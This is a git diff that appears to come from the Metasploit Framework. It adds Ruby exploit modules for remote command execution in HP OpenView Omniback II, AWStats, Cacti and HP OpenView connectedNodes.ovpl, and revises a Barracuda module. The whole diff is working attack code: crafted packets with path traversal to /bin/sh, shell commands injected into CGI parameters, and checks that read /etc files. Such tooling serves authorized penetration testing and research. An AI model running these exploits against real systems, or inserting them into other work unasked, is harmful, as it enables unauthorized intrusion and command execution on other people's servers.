diff --git a/modules/exploits/unix/misc/openview_omniback_exec.rb b/modules/exploits/unix/misc/openview_omniback_exec.rb new file mode 100644 index 0000000000..9211019868 --- /dev/null +++ b/modules/exploits/unix/misc/openview_omniback_exec.rb @@ -0,0 +1,116 @@ +require 'msf/core' + +module Msf + +class Exploits::Unix::Misc::OpenView_Omniback_Execute < Msf::Exploit::Remote + + include Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'HP OpenView Omniback II Command Execution', + 'Description' => %q{ + This module uses a vulnerability in the OpenView Omniback II + service to execute arbitrary commands. This vulnerability was + discovered by DiGiT and his code was used as the basis for this + module. + }, + 'Author' => [ 'hdm' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: 3778 $', + 'References' => + [ + ['OSVDB', '6018'], + ['URL', 'http://www.securiteam.com/exploits/6M00O150KG.html'], + ['MIL', '46'], + ], + 'Platform' => ['unix'], + 'Arch' => ARCH_CMD, + 'Privileged' => false, + 'Payload' => + { + 'Space' => 1024, + 'DisableNops' => true, + }, + 'Targets' => + [ + [ 'Automatic Target', { }] + ], + 'DisclosureDate' => 'Feb 28 2001', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(5555) + ], self.class) + end + + def check + connect + + poof = + "\x00\x00\x00.2"+ + "\x00 a"+ + "\x00 0"+ + "\x00 0"+ + "\x00 0"+ + "\x00 A"+ + "\x00 28"+ + "\x00/../../../bin/sh"+ + "\x00\x00"+ + "digit "+ + "AAAA\n\x00" + + sock.put(poof) + sock.put("echo /etc/*;\n") + res = sock.get_once(-1, 5) + disconnect + + if (not (res and res.length > 0)) + print_status("The remote service did not reply to our request") + return Exploit::CheckCode::Safe + end + + if (res =~ /passwd|group|resolv/) + print_status("The remote service is exploitable") + return Exploit::CheckCode::Vulnerable + end + + return Exploit::CheckCode::Safe + end + + + def exploit + connect + + poof = + "\x00\x00\x00.2"+ + "\x00 a"+ + "\x00 0"+ + "\x00 0"+ + "\x00 0"+ + "\x00 A"+ + "\x00 28"+ + "\x00/../../../bin/sh"+ + "\x00\x00"+ + "digit "+ + "AAAA\n\x00" + + sock.put(poof) + sock.put(payload.encoded + ";\n") + res = sock.get_once(-1, 5) + + if (not (res and res.length > 0)) + print_status("The remote service did not reply to our request") + disconnect + return + end + + print(res) + + handler + disconnect + end + +end +end diff --git a/modules/exploits/unix/webapp/awstats_configdir_exec.rb b/modules/exploits/unix/webapp/awstats_configdir_exec.rb new file mode 100644 index 0000000000..3a16df13ee --- /dev/null +++ b/modules/exploits/unix/webapp/awstats_configdir_exec.rb @@ -0,0 +1,92 @@ +require 'msf/core' + +module Msf + +class Exploits::Unix::Webapp::AWStats_ConfigDir_Execution < Msf::Exploit::Remote + + include Exploit::Remote::Tcp + include Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'AWStats configdir Remote Command Execution', + 'Description' => %q{ + This module exploits an arbitrary command execution vulnerability in the + AWStats CGI script. iDEFENSE has confirmed that AWStats versions 6.1 and 6.2 + are vulnerable. + }, + 'Authors' => [ 'Matteo Cantoni ', 'hdm' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: 3509 $', + 'References' => + [ + ['OSVDB', '13002'], + ['BID', '12298'], + ['CVE', '2005-0116'], + ['URL', 'http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities'], + ['MIL', '8'], + ], + 'Privileged' => false, + 'Payload' => + { + 'DisableNops' => true, + 'Space' => 512, + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => [[ 'Automatic', { }]], + 'DisclosureDate' => 'Jan 15 2005', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('URI', [true, "The full URI path to awstats.pl", "/cgi-bin/awstats.pl"]), + ], self.class) + end + + def check + res = send_request_cgi({ + 'uri' => datastore['URI'], + 'vars_get' => + { + 'configdir' => '|echo;cat /etc/hosts;echo|' + } + }, 25) + + if (res and res.body.match(/localhost/)) + return Exploit::CheckCode::Vulnerable + end + + return Exploit::CheckCode::Safe + end + + + def exploit + res = send_request_cgi({ + 'uri' => datastore['URI'], + 'vars_get' => + { + 'configdir' => %Q!|echo 'YYY'; #{payload.encoded}; echo 'YYY'|! + } + }, 25) + + if (res) + print_status("The server returned: #{res.code} #{res.message}") + print("") + + m = res.body.match(/YYY(.*)YYY/) + + if (m) + print_status("Command output from the server:") + print(m[1]) + else + print_status("This server may not be vulnerable") + end + + else + print_status("No response from the server") + end + end + +end +end diff --git a/modules/exploits/unix/webapp/barracuda_img_exec.rb b/modules/exploits/unix/webapp/barracuda_img_exec.rb index e3a14aac04..d08385046a 100644 --- a/modules/exploits/unix/webapp/barracuda_img_exec.rb +++ b/modules/exploits/unix/webapp/barracuda_img_exec.rb @@ -53,7 +53,11 @@ class Exploits::Unix::Webapp::Barracuda_Image_Execution < Msf::Exploit::Remote } }, 25) - res.match(/localhost/) ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe + if (res and res.body.match(/localhost/)) + return Exploit::CheckCode::Vulnerable + end + + return Exploit::CheckCode::Safe end def exploit @@ -66,11 +70,18 @@ class Exploits::Unix::Webapp::Barracuda_Image_Execution < Msf::Exploit::Remote }, 25) if (res) - print_status("The server returned: #{res.code}") + print_status("The server returned: #{res.code} #{res.message}") print("") - m = res.match(/YYY(.*)YYY/) - print(m[1]) if m + m = res.body.match(/YYY(.*)YYY/) + + if (m) + print_status("Command output from the server:") + print(m[1]) + else + print_status("This server may not be vulnerable") + end + else print_status("No response from the server") end diff --git a/modules/exploits/unix/webapp/cacti_graphimage_exec.rb b/modules/exploits/unix/webapp/cacti_graphimage_exec.rb new file mode 100644 index 0000000000..33b72f90f8 --- /dev/null +++ b/modules/exploits/unix/webapp/cacti_graphimage_exec.rb @@ -0,0 +1,94 @@ +require 'msf/core' + +module Msf + +class Exploits::Unix::Webapp::Cacti_GraphImage_Execution < Msf::Exploit::Remote + + include Exploit::Remote::Tcp + include Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Cacti graph_image.php Remote Command Execution', + 'Description' => %q{ + This module exploits an arbitrary command execution vulnerability in the + Raxnet Cacti 'graph_image.php' script. All versions of Raxnet Cacti prior to + 0.8.6-d are vulnerable. + }, + 'Authors' => [ 'David Maciejak ', 'hdm' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: 3509 $', + 'References' => + [ + ['BID', '14042'], + ['MIL', '96'], + ], + 'Privileged' => false, + 'Payload' => + { + 'DisableNops' => true, + 'Space' => 512, + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => [[ 'Automatic', { }]], + 'DisclosureDate' => 'Jan 15 2005', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('URI', [true, "The full URI path to graph_view.php", "/cacti/graph_view.php"]), + ], self.class) + end + + def exploit + # Obtain a valid image ID + res = send_request_cgi({ + 'uri' => datastore['URI'], + 'vars_get' => + { + 'action' => 'list' + } + }, 10) + + if (not res) + print_status("The server returned: #{res.code} #{res.message}") + return + end + + m = res.body.match(/local_graph_id=(.*?)&/) + if (not m) + print_status("Could not locate a valid image ID") + return + end + + # Trigger the command execution bug + res = send_request_cgi({ + 'uri' => datastore['URI'], + 'vars_get' => + { + 'local_graph_id' => m[1], + 'graph_start' => "\necho YYY;#{payload.encoded};echo YYY;echo\n" + } + }, 25) + + if (res) + print_status("The server returned: #{res.code} #{res.message}") + print("") + + m = res.body.match(/YYY(.*)YYY/) + + if (m) + print_status("Command output from the server:") + print(m[1]) + else + print_status("This server may not be vulnerable") + end + + else + print_status("No response from the server") + end + end + +end +end diff --git a/modules/exploits/unix/webapp/openview_connectednodes_exec.rb b/modules/exploits/unix/webapp/openview_connectednodes_exec.rb new file mode 100644 index 0000000000..1eebc03961 --- /dev/null +++ b/modules/exploits/unix/webapp/openview_connectednodes_exec.rb @@ -0,0 +1,75 @@ +require 'msf/core' + +module Msf + +class Exploits::Unix::Webapp::OpenView_ConnectedNodes_Execution < Msf::Exploit::Remote + + include Exploit::Remote::Tcp + include Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'HP Openview connectedNodes.ovpl Remote Command Execution', + 'Description' => %q{ + This module exploits an arbitrary command execution vulnerability in the + HP OpenView connectedNodes.ovpl CGI application. The results of the command + will be displayed to the screen. + }, + 'Authors' => [ 'Valerio Tesei ', 'hdm' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: 3509 $', + 'References' => + [ + ['OSVDB', '19057'], + ['BID', '14662'], + ['CVE', '2005-2773'], + ], + 'Privileged' => false, + 'Payload' => + { + 'DisableNops' => true, + 'Space' => 1024, + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => [[ 'Automatic', { }]], + 'DisclosureDate' => 'Aug 25 2005', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('URI', [true, "The full URI path to connectedNodes.ovpl", "/OvCgi/connectedNodes.ovpl"]), + ], self.class) + end + + def exploit + + # Trigger the command execution bug + res = send_request_cgi({ + 'uri' => datastore['URI'], + 'vars_get' => + { + 'node' => %Q!; echo YYY; #{payload.encoded}; echo YYY| tr "\\n" "#{0xa3.chr}"! + } + }, 25) + + if (res) + print_status("The server returned: #{res.code} #{res.message}") + print("") + + m = res.body.match(/YYY(.*)YYY/) + + if (m) + print_status("Command output from the server:") + print(m[1]) + else + print_status("This server may not be vulnerable") + end + + else + print_status("No response from the server") + end + end + +end +end